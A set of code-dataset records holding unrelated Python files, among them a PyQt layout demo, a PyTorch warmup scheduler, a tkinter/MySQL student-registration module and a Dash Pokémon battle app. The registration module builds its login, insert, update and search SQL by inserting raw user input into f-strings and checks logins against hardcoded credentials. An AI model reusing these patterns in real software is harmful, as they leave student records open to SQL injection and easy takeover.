button_1.move(50, 60)\n button_2 = QPushButton('按钮2', self)\n button_2.move(150, 60)\n\n button_3 = QPushButton('按钮3', self)\n\n # 创建一个网格布局对对象\n grid_layout = QGridLayout()\n\n grid_layout.addWidget(label, 0, 0)\n grid_layout.addWidget(button_1, 0, 1)\n grid_layout.addWidget(label2, 1, 0)\n grid_layout.addWidget(button_2, 1, 1)\n grid_layout.addWidget(button_3, 2, 0, 1, 5)\n\n # 设置对齐方式\n grid_layout.setAlignment(Qt.AlignTop)\n # grid_layout.setAlignment(Qt.AlignBottom)\n # grid_layout.setAlignment(Qt.AlignRight)\n\n # 创建一个窗口对象\n layout_widget = QWidget()\n layout_widget.setLayout(grid_layout)\n\n self.setCentralWidget(layout_widget)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n gui = GUI()\n gui.show()\n sys.exit(app.exec_())\n","repo_name":"CYZZ/LearningPython-100day","sub_path":"MyGUIpy/myQTDemo4.py","file_name":"myQTDemo4.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23254905559","text":"from torch.optim import Optimizer\nfrom torch.optim.lr_scheduler import _LRScheduler\n\n\nclass LinearWarmup(_LRScheduler):\n def __init__(self,\n optimizer: Optimizer,\n lr: float,\n num_steps: int,\n *args,\n **kwargs):\n self._lr = lr\n self._num_steps = num_steps\n super().__init__(optimizer, *args, **kwargs)\n\n def get_lr(self):\n lr_scale = min(1.0, float(self._step_count + 1) /\n float(self._num_steps))\n lr = lr_scale * self._lr\n return [lr] * len(self.optimizer.param_groups)\n","repo_name":"thavlik/machine-learning-portfolio","sub_path":"src/linear_warmup.py","file_name":"linear_warmup.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"74562660586","text":"\"\"\"\nThe implementation of the daily script invoked by `kgx daily`.\n\"\"\"\nimport datetime\n\nfrom base import goals as goals_service\nfrom base.database import Database, Row\nfrom base.utils import KgDate\n\nMONDAY = 0\nWEDNESDAY = 2\nTHURSDAY = 3\nFRIDAY = 4\nSATURDAY = 5\nSUNDAY = 6\n\n\ndef daily_task(db: Database, date: datetime.date) -> None:\n \"\"\"\n Unconditionally runs the daily script.\n\n Unlike ``kgx daily``, this function DOES NOT check if the daily script has already\n been run. Callers of this function should generally do so themselves since running\n the daily script multiple times on the same day can cause redundant data in the\n database.\n \"\"\"\n # On the first day of the month...\n if date.day == 1:\n # ...freeze the progress of auto-progress goals.\n freeze_auto_progress_goals(db, date)\n\n create_recurring_expenses(db, date)\n\n\ndef create_recurring_expenses(db: Database, date: datetime.date) -> None:\n # Create any recurring expenses, e.g.\n # if date.day == 1:\n # db.insert(\n # \"credits\",\n # {\n # \"date_paid\": date,\n # \"date_incurred\": date,\n # \"amount\": decimal.Decimal(\"10\"),\n # \"vendor\": get_vendor(db, \"Spotify\"),\n # \"category\": get_credit_category(db, \"Recreation\", \"Music\"),\n # \"payment_method\": \"Discover\",\n # },\n # )\n pass\n\n\ndef get_vendor(db: Database, name: str) -> Row:\n vendor = db.get(\"vendors\", where=\"name = :name\", values={\"name\": name})\n if vendor is None:\n raise Exception(f\"no vendor named {name!r} found\")\n return vendor[\"id\"]\n\n\ndef get_credit_category(db: Database, category: str, subcategory: str) -> Row:\n category_row = db.get(\n \"credit_categories\",\n where=\"category = :category AND subcategory = :subcategory\",\n values={\"category\": category, \"subcategory\": subcategory},\n )\n if category_row is None:\n raise Exception(f\"category {category} / {subcategory} not found\")\n return category_row[\"id\"]\n\n\ndef freeze_auto_progress_goals(db: Database, date: datetime.date) -> None:\n last_day_of_timespan = date - datetime.timedelta(days=1)\n kg_date = KgDate(year=date.year, month=date.month, day=date.day)\n start_of_month = kg_date.minus(months=1)\n\n monthly_goals = db.select(\n \"goals\",\n where=\"timespan = 'month' AND date = :date\",\n values={\"date\": start_of_month.isoformat()},\n )\n for goal in monthly_goals:\n auto_progress = goals_service.get_auto_progress(db, last_day_of_timespan, goal)\n if auto_progress is not None:\n db.update_by_pk(\"goals\", goal[\"id\"], {\"progress\": auto_progress})\n\n if ((date.month - 1) % 3) == 0:\n start_of_quarter = kg_date.minus(months=3)\n\n quarterly_goals = db.select(\n \"goals\",\n where=\"timespan = 'quarter' AND date = :date\",\n values={\"date\": start_of_quarter.isoformat()},\n )\n for goal in quarterly_goals:\n auto_progress = goals_service.get_auto_progress(\n db, last_day_of_timespan, goal\n )\n if auto_progress is not None:\n db.update_by_pk(\"goals\", goal[\"id\"], {\"progress\": auto_progress})\n\n if date.month == 1:\n start_of_year = kg_date.minus(years=1)\n\n yearly_goals = db.select(\n \"goals\",\n where=\"timespan = 'year' AND date = :date\",\n values={\"date\": start_of_year.isoformat()},\n )\n for goal in yearly_goals:\n auto_progress = goals_service.get_auto_progress(\n db, last_day_of_timespan, goal\n )\n if auto_progress is not None:\n db.update_by_pk(\"goals\", goal[\"id\"], {\"progress\": auto_progress})\n","repo_name":"iafisher/khaganate-snapshot","sub_path":"base/daily.py","file_name":"daily.py","file_ext":"py","file_size_in_byte":3801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41818393810","text":"# Receba as tres dimensoes de um cuboide, e mostre todas as\n# coordenadas possiveis que\n# a soma não seja o valor N\n\nx = int(input())\ny = int(input())\nz = int(input())\nn = int(input())\n\nfinal = []\n\nfor i in range(x+1):\n for j in range(y+1):\n for k in range(z+1):\n if (i + j + k != n):\n final.append([i, j, k])\n\nprint(final)\n","repo_name":"pedroportilho/hacker-rank-python","sub_path":"exercises/08_list_comprehension.py","file_name":"08_list_comprehension.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17732625657","text":"from app import *\nfrom programa import login\n\n\nimport mysql.connector\nimport mysql.connector\nfrom tkinter import * \nfrom tkinter import messagebox\nfrom tkcalendar import *\n\n\nstatus1 = bool\n\nclass BancoDados():\n \n def conectar_bd(self):\n self.conexao = mysql.connector.connect(\n host='localhost',\n user='root',\n password='senha',\n database='database'\n )\n self.cursor = self.conexao.cursor()\n\n def desconectar_bd(self):\n self.cursor.close()\n self.conexao.close()\n\n def entrar(janela):\n #Dando valor as variaveis do App\n janela.usu = janela.usuario.get()\n janela.sen = janela.senha.get()\n\n #Conectando com o banco de dados\n janela.conectar_bd()\n\n #Comando SQL para buscar usuario\n janela.comando = f'SELECT * FROM login WHERE Usuario=\"{janela.usu}\" AND Senha={janela.sen}'\n janela.cursor.execute(janela.comando)\n janela.resultado = janela.cursor.fetchall()\n\n #Verificar se dados estão corretos\n try:\n if janela.resultado[0][0] != 'MAXTER' or janela.resultado[0][1] != '123456':\n print('Usuário não logado')\n elif janela.resultado[0][0] in 'MAXTER' and janela.resultado[0][1] in '123456':\n print('Usuário logado')\n global status1\n status1 = True\n # messagebox.showinfo(title='Curso maxter', message='Usuário logado')\n return status1\n except:\n status1 = False\n print(status1)\n print('Usuario não existe')\n # messagebox.showinfo(title='Curso Maxter', message='ERRO!\\nPor Favor, tente novamente')\n return status1\n \n #Fechar banco de dados\n janela.desconectar_bd()\n\n return status1\n\n def sair(self):\n\n #Comando para voltar Tela de Login\n global status\n status = False\n if status == False:\n self.destroy()\n \n def salvar(self):\n\n #Conectando com o banco de dados\n self.conectar_bd()\n\n try:\n #Comando SQL para salvar dados usuario\n self.comando = f'''INSERT INTO cadastro1 (duracao_inicio, duracao_fim, curso, turno, escola, \n nome_aluno, data_nascimento, cpf, identidade,\n estado_civil, email, celular,\n cep, endereço, bairro, cidade,\n pai, mae,\n nome_responsavel, email_responsavel, cpf_responsavel, identidade_responsavel, celular_responsavel,\n valor_total, taxa_matricula, plano_1, plano_2, atual) \n VALUES (\"{self.duracao_inicio.get()}\", \"{self.duracao_fim.get()}\", \"{self.curso.get()}\", \"{self.turno.get()}\", \"{self.escola.get()}\",\n \"{self.nome_aluno.get()}\", \"{self.data_nascimento.get()}\", \"{self.cpf_aluno.get()}\", \"{self.identidade_aluno.get()}\",\n \"{self.estado_civil.get()}\", \"{self.email_aluno.get()}\", \"{self.celular_aluno.get()}\",\n \"{self.cep.get()}\", \"{self.endereco.get()}\", \"{self.bairro.get()}\", \"{self.cidade.get()}\", \n \"{self.pai.get()}\", \"{self.mae.get()}\",\n \"{self.nome_responsavel.get()}\", \"{self.email_responsavel.get()}\", \"{self.cpf_responsavel.get()}\", \"{self.identidade_responsavel.get()}\", \"{self.celular_responsavel.get()}\",\n \"{self.valor_total.get()}\", \"{self.taxa_matricula.get()}\", \"{self.plano_1.get()}\", \"{self.plano_2.get()}\", \"1\")'''\n self.cursor.execute(self.comando)\n self.conexao.commit()\n messagebox.showinfo('Curso Maxter', 'Aluno salvo com sucesso.')\n except:\n messagebox.showerror('Curso Maxter', 'ERRO!\\nNão foi possivel salvar dados.')\n\n #Fechar banco de dados\n self.desconectar_bd()\n\n def atualizar(self):\n\n #Conectando com o banco de dados\n self.conectar_bd()\n\n # try:\n # #Comando SQL para buscar ID usuario\n # self.comando = f'SELECT * FROM cadastro1 WHERE nome_aluno = \"{self.nome_aluno.get()}\" '\n # self.cursor.execute(self.comando)\n # self.resultado = self.cursor.fetchall()\n\n # self.id = self.resultado[0][0]\n # except:\n # messagebox.showerror('Curso Maxter', 'ERRO!\\nNão foi possivel buscar aluno.')\n\n\n try:\n #Comandos SQL para atualizar dados usuario\n self.comando = f'''\n UPDATE cadastro1\n SET duracao_inicio = \"{self.duracao_inicio.get()}\", duracao_fim = \"{self.duracao_fim.get()}\", curso = \"{self.curso.get()}\", turno = \"{self.turno.get()}\", escola = \"{self.escola.get()}\",\n nome_aluno = \"{self.nome_aluno.get()}\", data_nascimento = \"{self.data_nascimento.get()}\", cpf = \"{self.cpf_aluno.get()}\", identidade = \"{self.identidade_aluno.get()}\",\n estado_civil = \"{self.estado_civil.get()}\", email = \"{self.email_aluno.get()}\", celular = \"{self.celular_aluno.get()}\", \n cep = \"{self.cep.get()}\", endereço = \"{self.endereco.get()}\", bairro = \"{self.bairro.get()}\", cidade = \"{self.cidade.get()}\",\n pai = \"{self.pai.get()}\", mae = \"{self.mae.get()}\", \n nome_responsavel = \"{self.nome_responsavel.get()}\", email_responsavel = \"{self.email_responsavel.get()}\", cpf_responsavel = \"{self.cpf_responsavel.get()}\", identidade_responsavel = \"{self.identidade_responsavel.get()}\", celular_responsavel = \"{self.celular_responsavel.get()}\",\n valor_total = \"{self.valor_total.get()}\", taxa_matricula = \"{self.taxa_matricula.get()}\", plano_1 = \"{self.plano_1.get()}\", plano_2 = \"{self.plano_2.get()}\"\n WHERE nome_aluno = \"{self.nome_aluno.get()}\" or cpf = \"{self.cpf_aluno.get()}\" '''\n self.cursor.execute(self.comando)\n self.conexao.commit()\n messagebox.showinfo('Curso Maxter', 'Aluno atualizado com sucesso.')\n except:\n messagebox.showerror('Curso Maxter', 'ERRO!\\nNão foi possivel achar usuario.')\n\n #Fechar banco de dados\n self.desconectar_bd()\n\n\n def mudarStatus(self):\n\n #Conectando com o banco de dados\n self.conectar_bd()\n\n try:\n #Comandos SQL para atualizar dados usuario\n self.comando = f'''\n UPDATE cadastro1\n SET status = \"NÃO PAGO\" \n WHERE id >= 0'''\n self.cursor.execute(self.comando)\n self.conexao.commit()\n except:\n messagebox.showerror('Curso Maxter', 'ERRO!\\nNão foi possivel Atualizar Status.')\n\n #Fechar banco de dados\n self.desconectar_bd()\n\n\n def buscar(self):\n\n #Conectando com o banco de dados\n self.conectar_bd()\n\n try:\n #Comando SQL para buscar usuario\n self.comando = f'SELECT * FROM cadastro1 WHERE nome_aluno = \"{self.nome_busca.get()}\" OR cpf = \"{self.cpf_busca.get()}\" '\n self.cursor.execute(self.comando)\n self.resultado = self.cursor.fetchall()\n\n #Preenchendo campos com os dados BD\n self.id.insert(0, self.resultado[0][0])\n self.duracao_inicio.insert(0, self.resultado[0][1])\n self.duracao_fim.set(self.resultado[0][2])\n self.curso.set(self.resultado[0][3])\n self.turno.set(self.resultado[0][4])\n self.escola.insert(0, self.resultado[0][5])\n self.nome_aluno.insert(0, self.resultado[0][6])\n self.data_nascimento.insert(0, self.resultado[0][7])\n self.cpf_aluno.insert(0, self.resultado[0][8])\n self.identidade_aluno.insert(0, self.resultado[0][9])\n self.estado_civil.set(self.resultado[0][10])\n self.email_aluno.insert(0, self.resultado[0][11])\n self.celular_aluno.insert(0, self.resultado[0][12])\n self.cep.insert(0, self.resultado[0][13])\n self.endereco.insert(0, self.resultado[0][14])\n self.bairro.insert(0, self.resultado[0][15])\n self.cidade.insert(0, self.resultado[0][16])\n self.pai.insert(0, self.resultado[0][17])\n self.mae.insert(0, self.resultado[0][18])\n self.nome_responsavel.insert(0, self.resultado[0][19])\n self.email_responsavel.insert(0, self.resultado[0][20])\n self.cpf_responsavel.insert(0, self.resultado[0][21])\n self.identidade_responsavel.insert(0, self.resultado[0][22])\n self.celular_responsavel.insert(0, self.resultado[0][23])\n except:\n messagebox.showerror('Curso Maxter', 'ERRO!\\nNão foi possivel buscar aluno.')\n\n\n #Fechar banco de dados\n self.desconectar_bd()\n\n\n def buscarAluno(self):\n\n #Conectando com o banco de dados\n self.conectar_bd()\n\n print(self.nome_busca.get())\n\n try:\n #Comando SQL para buscar usuario\n self.comando = f'SELECT * FROM cadastro1 WHERE nome_aluno = \"{self.nome_busca.get()}\" OR cpf = \"{self.cpf_busca.get()}\" '\n self.cursor.execute(self.comando)\n self.resultado = self.cursor.fetchall()\n print(self.nome_busca.get())\n #Pegar curso do aluno\n curso = self.resultado[0][3]\n print(curso)\n\n if 'CEFET' in curso:\n #Preenchendo campos com os dados BD\n self.lb_id_aluno_cefet.set(self.resultado[0][0])\n self.lb_curso_aluno_cefet.set(self.resultado[0][3])\n self.lb_turno_aluno_cefet.set(self.resultado[0][4])\n self.lb_escola_aluno_cefet.set(self.resultado[0][5])\n self.lb_nome_aluno_cefet.set(self.resultado[0][6])\n self.lb_cpf_aluno_cefet.set(self.resultado[0][8])\n self.lb_nome_responsavel_cefet.set(self.resultado[0][19])\n self.mensalidade = self.resultado[0][27]\n self.mensalidade = f'{self.mensalidade[14:]}'\n self.mensalidade = self.mensalidade.strip()\n self.lb_mensalidade_aluno_cefet.set(self.mensalidade)\n self.lb_forma_pagamento_aluno_cefet.set(self.resultado[0][29])\n self.lb_status_aluno.set(self.resultado[0][30]) \n else:\n self.lb_id_aluno_enem.set(self.resultado[0][0])\n self.lb_curso_aluno_enem.set(self.resultado[0][3])\n self.lb_turno_aluno_enem.set(self.resultado[0][4])\n self.lb_escola_aluno_enem.set(self.resultado[0][5])\n self.lb_nome_aluno_enem.set(self.resultado[0][6])\n self.lb_cpf_aluno_enem.set(self.resultado[0][8])\n self.lb_nome_responsavel_enem.set(self.resultado[0][19])\n self.mensalidade = self.resultado[0][27]\n self.mensalidade = f'{self.mensalidade[14:]}'\n self.mensalidade = self.mensalidade.strip()\n self.lb_mensalidade_aluno_enem.set(self.mensalidade)\n self.lb_forma_pagamento_aluno_enem.set(self.resultado[0][29])\n self.lb_status_aluno.set(self.resultado[0][30])\n except:\n messagebox.showerror('Curso Maxter', 'ERRO!\\nNão foi possivel buscar aluno.')\n\n\n #Fechar banco de dados\n self.desconectar_bd()\n\n\n def buscarUltimoMesPago(self):\n\n #Conectando com o banco de dados\n self.conectar_bd()\n\n print(self.nome_busca.get())\n\n try:\n #Comando SQL para buscar usuario\n self.comando = f'SELECT * FROM cadastro1 WHERE nome_aluno = \"{self.nome_busca.get()}\" OR cpf = \"{self.cpf_busca.get()}\" '\n self.cursor.execute(self.comando)\n self.resultado = self.cursor.fetchall()\n print(self.nome_busca.get())\n\n #Preenchendo campos com os dados BD\n self.mes = self.resultado[0][28]\n\n return self.mes\n\n except:\n messagebox.showerror('Curso Maxter', 'ERRO!\\nNão foi possivel buscar aluno.')\n\n\n #Fechar banco de dados\n self.desconectar_bd()\n\n\n def buscarAlunoNaoPago(self):\n\n #Conectando com o banco de dados\n self.conectar_bd()\n\n try:\n #Comando SQL para buscar usuario\n self.comando = f'SELECT id, nome_aluno, curso, plano_2 FROM cursomaxter.cadastro1 WHERE status = \"NÃO PAGO\" AND atual = \"1\"; '\n self.cursor.execute(self.comando)\n self.resultado = self.cursor.fetchall()\n\n self.listaAlunoNaoPago = []\n\n #Preenchendo campos com os dados BD\n for i in self.resultado:\n print(i)\n self.listaAlunoNaoPago.append(i)\n\n print(self.listaAlunoNaoPago)\n \n return self.listaAlunoNaoPago\n\n except:\n messagebox.showerror('Curso Maxter', 'ERRO!\\nNão foi possivel buscar aluno.')\n\n\n #Fechar banco de dados\n self.desconectar_bd()","repo_name":"lucasaaz/Programa_Interface_Grafica_Python","sub_path":"programa/bancoDados.py","file_name":"bancoDados.py","file_ext":"py","file_size_in_byte":13722,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39547855759","text":"from dash import html, dcc, State\nimport dash_bootstrap_components as dbc\nfrom dash.dependencies import Input, Output\nfrom app import app\nfrom pages import poke_choose, battle_page, create_poke\nfrom components import navbar\nfrom pokemon import Pokemon\nfrom battle import game_round\nfrom driver import moves, pokemons, add_poke\n\n\n# Define the navbar\nnav = navbar.Navbar()\n\n# Define the index page layout\napp.layout = html.Div([\n # placeholder\n html.Div(id='hidden-div', style={'display': 'none'}),\n\n # stored values\n dcc.Store(id='error', data=False),\n dcc.Store(id=\"player-pokemon\", storage_type=\"session\"),\n dcc.Store(id=\"player-moves\", storage_type=\"session\"),\n dcc.Store(id=\"opponent-pokemon\", storage_type=\"session\"),\n dcc.Store(id=\"won\", data=False, storage_type=\"session\"),\n dcc.Store(id=\"winner\", data='', storage_type=\"session\"),\n dcc.Store(id=\"start-stats\", data=None, storage_type=\"session\"),\n\n dcc.Location(id='url', refresh=False),\n nav,\n html.Div(id='page-content', children=[]),\n\n # selection error for game start\n dbc.Modal([\n dbc.ModalHeader(\n dbc.ModalTitle(\"Invalid Selection\")\n ),\n dbc.ModalBody(children='Too many moves selected', id='error-message'),\n dbc.ModalFooter()], id='select-error', is_open=False)\n], style={'backgroundColor': '#fcfcfc', 'color': '#414141'})\n\n\n@app.callback(Output('page-content', 'children'),\n Input('url', 'pathname')\n)\ndef display_page(pathname):\n \"\"\"\n define page layout based on page url\n \"\"\"\n if pathname == '/':\n return poke_choose.layout\n if pathname == '/battle':\n return battle_page.layout\n if pathname == '/create':\n return create_poke.layout\n else: # if redirected to unknown link\n return \"404 Page Error! Please choose a link\"\n\n\n@app.callback(\n Output('move-options', 'options'),\n Input('pokemon-options', 'value'),\n prevent_initial_call=True\n)\ndef get_move_options(chosen):\n \"\"\"\n display moveset for chosen pokemon\n :param chosen: name of chosen pokemon\n :return: moveset to display\n \"\"\"\n options = []\n if chosen:\n for move in pokemons[chosen].moveset:\n options.append(moves[move].name)\n\n return options\n\n\n@app.callback(\n Output('move-options', 'value'),\n Input('pokemon-options', 'value'),\n prevent_initial_call=True\n)\ndef reset_move_options(chosen):\n \"\"\" reset chosen moves on new pokemon select \"\"\"\n return []\n\n\n# TODO: add stats\n@app.callback(\n Output('select-img', 'src'),\n Input('pokemon-options', 'value'),\n prevent_initial_call=True\n)\ndef select_stats(chosen):\n \"\"\" get image and stats for pokemon when clicked on select screen\"\"\"\n return pokemons[chosen].picture\n\n\n@app.callback(\n [Output('poke-types', 'children'),\n Output('poke-hp', 'children'),\n Output('poke-speed', 'children'),\n Output('poke-attack', 'children'),\n Output('poke-defense', 'children'),\n Output('poke-spattack', 'children'),\n Output('poke-spdefense', 'children')],\n Input('pokemon-options', 'value'),\n prevent_initial_call=True\n)\ndef select_page_stats(poke):\n \"\"\" gets stats for current selected pokemon on select page \"\"\"\n pokemon = pokemons[poke]\n\n return 'Types: ' + '/'.join(pokemon.types), 'hP: ' + str(pokemon.health), 'Speed: ' + str(pokemon.speed), \\\n 'Attack: ' + str(pokemon.attack), 'Defense: ' + str(pokemon.defense), \\\n 'Special Attack: ' + str(pokemon.spattack), 'Special Defense: ' + str(pokemon.spdefense)\n\n\n@app.callback(\n [Output('player-pokemon', 'data'),\n Output('player-moves', 'data')],\n [Input('start-game-button', 'n_clicks'),\n Input('pokemon-options', 'value'),\n Input('move-options', 'value')],\n prevent_initial_call=True\n)\ndef pokemon_chosen(started, poke_choice, moves_choice):\n \"\"\"\n store selected pokemon and moveset for game play\n :param started: int; signifies start game button clicked\n :param poke_choice: str; selected pokemon\n :param moves_choice: lst; selected moves\n :return:\n \"\"\"\n if started:\n return poke_choice, moves_choice\n\n return None, None\n\n\n@app.callback(\n Output('opponent-pokemon', 'data'),\n Input('player-pokemon', 'data'),\n prevent_initial_call=True\n)\ndef get_opponent(player):\n \"\"\" get opponent on game start \"\"\"\n if player:\n return pokemons[player].random_opp(pokemons).name\n\n return None\n\n\n@app.callback(\n [Output('start-game-button', 'disabled'),\n Output('select-error', 'is_open')],\n Input('move-options', 'value'),\n prevent_initial_call=True\n)\ndef enable_start(moves_chosen):\n \"\"\"\n enable start button if choices are valid\n :param moves_chosen: lst; moves selected\n :return: - if start game button is disabled\n - if error modal is open\n \"\"\"\n if moves_chosen and len(moves_chosen) > 4:\n return True, True\n elif moves_chosen:\n return False, False\n\n return True, False\n\n\n@app.callback(\n [Output('opponent-name', 'children'),\n Output('player-name', 'children'),\n Output('move-header', 'children')],\n [Input('player-pokemon', 'data'),\n Input('opponent-pokemon', 'data')]\n)\ndef add_names(player_name, opp_name):\n \"\"\" places selected pokemon names in interface page \"\"\"\n return opp_name, player_name, f'What will {player_name} do?'\n\n\n@app.callback(\n Output('start-stats', 'data'),\n [Input('player-pokemon', 'data'),\n Input('opponent-pokemon', 'data')],\n prevent_initial_call=True\n)\ndef save_orig(play_name, opp_name):\n \"\"\" Saves the original stats of the pokemon and opponent\n :param play_name: pokemon object; player's chosen pokemon\n :param opp_name: pokemon object; opponent's pokemon\n \"\"\"\n if play_name and opp_name:\n player = pokemons[play_name]\n opp = pokemons[opp_name]\n return {\"player\": [player.attack, player.defense, player.spattack, player.spdefense, player.speed],\n \"opponent\": [opp.attack, opp.defense, opp.spattack, opp.spdefense, opp.speed]}\n \n return {}\n\n\n# TODO: opponent sprite\n@app.callback(\n [Output('player-sprite', 'src'),\n Output('opponent-sprite', 'src')],\n [Input('player-pokemon', 'data'),\n Input('opponent-pokemon', 'data')]\n)\ndef get_sprites(player_name, opp_name):\n \"\"\" places selected pokemon sprites in interface page \"\"\"\n return pokemons[player_name].picture, pokemons[opp_name].picture\n\n\n@app.callback(\n [Output('player-describe', 'children'),\n Output('player-types', 'children'),\n Output('player-hp', 'children'),\n Output('player-status', 'children'),\n Output('player-speed', 'children'),\n Output('player-attack', 'children'),\n Output('player-defense', 'children'),\n Output('player-spattack', 'children'),\n Output('player-spdefense', 'children')],\n [Input('player-pokemon', 'data'),\n Input('game-log', 'children')],\n prevent_initial_call=True\n)\ndef player_stat_box(player_name, log):\n \"\"\"\n get player pokemon description to display\n Args:\n player_name: player pokemon\n log: current game history (will cause to update as rounds are played)\n\n Returns: player stats to display\n\n \"\"\"\n pokemon = pokemons[player_name]\n status = 'None'\n\n # display health as pos\n if pokemon.health > 0:\n health = pokemon.health\n else:\n health = 0\n\n # check for status effects\n if list(pokemon.start_status.keys()) + list(pokemon.end_status.keys()):\n ls = list(pokemon.start_status.keys()) + list(pokemon.end_status.keys())\n status = ls[0]\n\n return player_name, '/'.join(pokemon.types), 'hP: ' + str(health), 'Status Condition: ' + status, \\\n 'Speed: ' + str(pokemon.speed), 'Attack: ' + str(pokemon.attack), 'Defense: ' + str(pokemon.defense), \\\n 'Special Attack: ' + str(pokemon.spattack), 'Special Defense: ' + str(pokemon.spdefense)\n\n\n@app.callback(\n [Output('opp-describe', 'children'),\n Output('opp-types', 'children'),\n Output('opp-hp', 'children'),\n Output('opp-status', 'children'),\n Output('opp-speed', 'children'),\n Output('opp-attack', 'children'),\n Output('opp-defense', 'children'),\n Output('opp-spattack', 'children'),\n Output('opp-spdefense', 'children')],\n [Input('opponent-pokemon', 'data'),\n Input('game-log', 'children')],\n prevent_initial_call=True\n)\ndef opp_stat_box(opp_name, log):\n \"\"\"\n get opponent pokemon description to display\n Args:\n opp_name: opponent pokemon\n log: current game history (will cause to update as rounds are played)\n\n Returns: opponent stats to display\n \"\"\"\n pokemon = pokemons[opp_name]\n status = 'None'\n\n # display health as pos\n if pokemon.health > 0:\n health = pokemon.health\n else:\n health = 0\n\n if list(pokemon.start_status.keys()) + list(pokemon.end_status.keys()):\n ls = list(pokemon.start_status.keys()) + list(pokemon.end_status.keys())\n status = ls[0]\n\n return opp_name, '/'.join(pokemon.types), 'hP: ' + str(health), 'Status Condition: ' + status, \\\n 'Speed: ' + str(pokemon.speed), 'Attack: ' + str(pokemon.attack), 'Defense: ' + str(pokemon.defense), \\\n 'Special Attack: ' + str(pokemon.spattack), 'Special Defense: ' + str(pokemon.spdefense)\n\n\n@app.callback(\n [Output('move-1', 'children'),\n Output('move-2', 'children'),\n Output('move-3', 'children'),\n Output('move-4', 'children'),\n Output('move-1', 'title'),\n Output('move-2', 'title'),\n Output('move-3', 'title'),\n Output('move-4', 'title'),],\n Input('player-moves', 'data')\n)\ndef get_moves(moves_chosen):\n \"\"\" places selected pokemon moves in interface page \"\"\"\n\n # number of missing moves\n blank = 4 - len(moves_chosen)\n\n moves_chosen = moves_chosen + ['NO MOVE'] * blank\n return moves_chosen + [moves[_.lower()].desc if _ != 'NO MOVE' else None for _ in moves_chosen]\n\n\n@app.callback(\n [Output('move-1', 'disabled'),\n Output('move-2', 'disabled'),\n Output('move-3', 'disabled'),\n Output('move-4', 'disabled')],\n [Input('move-1', 'disabled'),\n Input('move-2', 'children'),\n Input('move-3', 'children'),\n Input('move-4', 'children'),\n Input('won', 'data')]\n)\ndef disable_moves(move1, move2, move3, move4, won):\n \"\"\" disable inactive moves (when less than 4 moves have been selected) \"\"\"\n if won:\n return [True] * 4\n\n return [True if move == 'NO MOVE' else False for move in [move1, move2, move3, move4]]\n\n@app.callback(\n [Output('create_name', 'value'),\n Output('create_type', 'value'),\n Output('create_health', 'value'),\n Output('create_attack', 'value'),\n Output('create_defense', 'value'),\n Output('create_spattack', 'value'),\n Output('create_spdefense', 'value'),\n Output('create_speed', 'value'),\n Output('create_moves', 'value'),\n Output('create_image', 'value')],\n [Input('submitted', 'n_clicks')],\n [State('create_name', 'value'),\n State('create_type', 'value'),\n State('create_health', 'value'),\n State('create_attack', 'value'),\n State('create_defense', 'value'),\n State('create_spattack', 'value'),\n State('create_spdefense', 'value'),\n State('create_speed', 'value'),\n State('create_moves', 'value'),\n State('create_image', 'value')],\n prevent_initial_call=True\n)\ndef create_pokemon(submit, name, types, health, att, defe, spat, spdef, speed, moveset, img):\n \"\"\" in progress : adds user created pokemon to the game \"\"\"\n if submit:\n if name not in pokemons:\n new_poke = Pokemon(name, types, health, att, defe, spat, spdef, speed, img, moveset)\n # pokemons[new_poke.name] = new_poke\n add_poke(new_poke)\n print(pokemons)\n\n return '', [], '', '', '', '', '', '', [], ''\n\n\n@app.callback(\n Output('pokemon-options', 'options'),\n Input('new-game-button', 'n_clicks')\n)\ndef new_poke_added(new):\n print('new!', pokemons)\n return [{'label': [html.Img(src=pokemon.picture, style={'height': '70px'}),\n\t\t\t\t\t\thtml.Span(name)],\n\t\t\t'value': name} for name, pokemon in pokemons.items()]\n\n\n@app.callback(\n [Output('won', 'data'),\n Output('winner', 'data'),\n Output('player-hp-bar', 'style'),\n Output('opp-hp-bar', 'style'),\n Output('game-log', 'children')],\n [Input('move-1', 'n_clicks_timestamp'),\n Input('move-2', 'n_clicks_timestamp'),\n Input('move-3', 'n_clicks_timestamp'),\n Input('move-4', 'n_clicks_timestamp')],\n [State('player-pokemon', 'data'),\n State('opponent-pokemon', 'data'),\n State('player-moves', 'data'),\n State('game-log', 'children')],\n prevent_initial_call=True\n)\ndef play_round(m1, m2, m3, m4, player, opp, moveset, curr_log):\n \"\"\"\n runs a battle round\n Args:\n m1-4: Move object; move 1 through 4 of the pokemon played\n player: pokemon object; player's pokemon\n opp: pokemon object; opponent's pokemon\n moveset: list of str; moves that player's pokemon can learn\n curr_log:\n\n Returns: won, winner: to check if game has been won and by who\n player-hp-bar, opp-hp-bar, game-log: stats to display on dash interface\n\n \"\"\"\n if m1 or m2 or m3 or m4:\n won = False\n winner = ''\n opp_move = pokemons[opp].choose_random_move().lower()\n\n # get chosen move\n click_times = [m1, m2, m3, m4]\n move_index = click_times.index(max(click_times))\n move_chosen = moveset[move_index].lower()\n\n log = game_round(pokemons[player], pokemons[opp], moves[move_chosen], moves[opp_move])\n\n # health percents\n player_hp_pct = (pokemons[player].health / pokemons[player].max_health) * 100\n opp_hp_pct = (pokemons[opp].health / pokemons[opp].max_health) * 100\n\n # check if pokemon fainted\n if player_hp_pct > 0:\n player_health = str(player_hp_pct) + '%'\n else:\n player_health = '0%'\n won = True\n winner = opp\n if opp_hp_pct > 0:\n opp_health = str(opp_hp_pct) + '%'\n else:\n opp_health = '0%'\n won = True\n winner = player\n\n # ad\n if curr_log:\n log = html.P([curr_log, html.Br(), log])\n else:\n log = html.P([log, html.Br()])\n\n return won, winner, {'width': player_health, 'height': '100%', 'backgroundColor': 'green',\n 'borderRadius': '3px'}, {'width': opp_health, 'height': '100%',\n 'backgroundColor': 'green', 'borderRadius': '3px'}, log\n\n return False, '', {'width': '100%', 'height': '100%', 'backgroundColor': 'green', 'borderRadius': '3px'}, \\\n {'width': '100%', 'height': '100%', 'backgroundColor': 'green', 